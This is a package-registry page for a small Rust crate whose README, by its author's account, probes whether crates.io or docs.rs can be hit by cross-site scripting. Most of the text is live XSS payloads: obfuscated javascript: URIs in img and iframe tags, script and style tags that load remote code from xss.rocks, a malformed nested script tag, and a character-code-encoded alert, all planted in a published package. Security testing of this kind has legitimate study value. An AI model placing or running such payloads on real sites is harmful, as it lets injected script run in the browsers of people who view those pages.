6 个版本

使用旧的 Rust 2015

0.1.5 2017 年 12 月 27 日
0.1.4 2017 年 12 月 27 日

#8 in #xss

ISC 许可证

8KB

测试 JS 注入

尝试一个 meta 标签

<style> h1 { color: red !important; } </style>

这个包只是一个测试,我在尝试找出 cargo.io 和/或 docs.rs 是否可能受到 XSS 攻击。

尝试将鼠标悬停在这张图片上

尝试在 img 标签中使用 src 属性执行 JavaScript

<img src=j&#X41vascript:alert('Injected from poisoned src from img tag in README.md')>

<IMG SRC=java\0script:alert("XSS")>

<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>

<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT SRC=http://xss.rocks/xss.js?< B ></SCRIPT> <SCRIPT SRC=//xss.rocks/.j> <iframe src=http://xss.rocks/scriptlet.html <</iframe>
<STYLE>@import'http://xss.rocks/xss.css';</STYLE> <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

尝试点击这个锚点

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

<script> alert(String.fromCharCode(73, 110, 106, 101, 99, 116, 101, 100, 32, 102, 114, 111, 109, 32, 115, 99, 114, 105, 112, 116, 32, 116, 97, 103, 32, 105, 110, 32, 82, 69, 65, 68, 77, 69, 46, 109, 100)); </script>

无运行时依赖